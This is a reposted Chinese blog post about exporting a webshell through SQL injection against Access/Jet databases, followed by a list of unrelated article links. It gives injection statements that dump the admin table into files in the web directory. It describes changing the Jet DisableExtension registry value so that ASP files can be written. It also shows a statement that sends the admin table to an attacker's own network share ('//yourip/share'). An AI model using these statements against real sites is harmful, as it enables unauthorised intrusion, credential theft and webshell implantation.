当前位置: 首页 > news >正文

SQL注入之导出WebShell

已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。

最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。

几个月之前网上就流传利用SQL注入Access导出数据库内容到文本文件(可导出txthtmhtml等格式)的方法:

 

SELECT * into [test.txt] in 'd:/web/' 'text;' from admin

 

执行上述语句,在d:/web目录下就会生成test.txt文件,其内容就是表admin的内容。但是导出asp格式就不行,会说“不能更新,数据库或对象为只读”。

其实控制导出文件后缀是存储在注册表的,具体键值是HKEY_LOCALMACHINE/Software/Microsoft/Jet/4.0/Engines/Text/DisableExtension,默认情况下值为“!txt,csv,tab,asc,tmp,htm,html”,如果我们把asp也添加进去的话,呵呵,就可以导出asp格式的文件了。

这个方法跟那个调用AccessShell函数执行命令一样,要修改注册表,所以利用不是很大。

顺便提一下,前面提到的导出文本文件的方法如果不知道web路径貌似可以导出到自己机器的哦:SELECT * into [test.txt] in '//yourip/share' 'text;' from admin

转载于:https://www.cnblogs.com/milantgh/p/4200728.html

相关文章:

  • lineman 的理念与 modern web app
  • Eclipse常用功能
  • jmeter+ant生成报告(ubuntu环境)
  • CentOS7.0安装Nginx 1.7.9
  • (转)利用PHP的debug_backtrace函数,实现PHP文件权限管理、动态加载 【反射】...
  • Bloom Filter概念和原理
  • git 忽略文件
  • XMPP协议学习笔记六(搭建Tigase开发环境)
  • PHP 运用rsa加密和解密实例
  • 个人犯的一个golang routine错误
  • (简单) HDU 2612 Find a way,BFS。
  • ZeroMQ接口函数之 :zmq_bind - 绑定一个socket
  • Objective - C基础: 第三天 - 1.NSString的基本认识
  • Windows Store App JavaScript 开发:页内导航
  • IOS 消息机制(NSNotificationCenter)
  • 2017年终总结、随想
  • Android框架之Volley
  • Angular2开发踩坑系列-生产环境编译
  • angular学习第一篇-----环境搭建
  • Apache Spark Streaming 使用实例
  • CEF与代理
  • Leetcode 27 Remove Element
  • nodejs:开发并发布一个nodejs包
  • Solarized Scheme
  • 七牛云假注销小指南
  • 算法之不定期更新(一)(2018-04-12)
  • 我的zsh配置, 2019最新方案
  • ​DB-Engines 11月数据库排名:PostgreSQL坐稳同期涨幅榜冠军宝座
  • (1)安装hadoop之虚拟机准备(配置IP与主机名)
  • (3)Dubbo启动时qos-server can not bind localhost22222错误解决
  • (MATLAB)第五章-矩阵运算
  • (备忘)Java Map 遍历
  • (多级缓存)多级缓存
  • (附源码)ssm户外用品商城 毕业设计 112346
  • (剑指Offer)面试题34:丑数
  • (三)mysql_MYSQL(三)
  • (原创)boost.property_tree解析xml的帮助类以及中文解析问题的解决
  • (原創) 如何使用ISO C++讀寫BMP圖檔? (C/C++) (Image Processing)
  • (转)h264中avc和flv数据的解析
  • .Net - 类的介绍
  • .net 4.0 A potentially dangerous Request.Form value was detected from the client 的解决方案
  • .NET 4.0网络开发入门之旅-- 我在“网” 中央(下)
  • .NET C# 使用 SetWindowsHookEx 监听鼠标或键盘消息以及此方法的坑
  • .NET 线程 Thread 进程 Process、线程池 pool、Invoke、begininvoke、异步回调
  • .net获取当前url各种属性(文件名、参数、域名 等)的方法
  • .net之微信企业号开发(一) 所使用的环境与工具以及准备工作
  • .pub是什么文件_Rust 模块和文件 - 「译」
  • .so文件(linux系统)
  • @Autowired和@Resource的区别
  • @Autowired自动装配
  • @private @protected @public
  • [ 蓝桥杯Web真题 ]-Markdown 文档解析
  • [ 手记 ] 关于tomcat开机启动设置问题
  • [17]JAVAEE-HTTP协议
  • [acwing周赛复盘] 第 69 场周赛20220917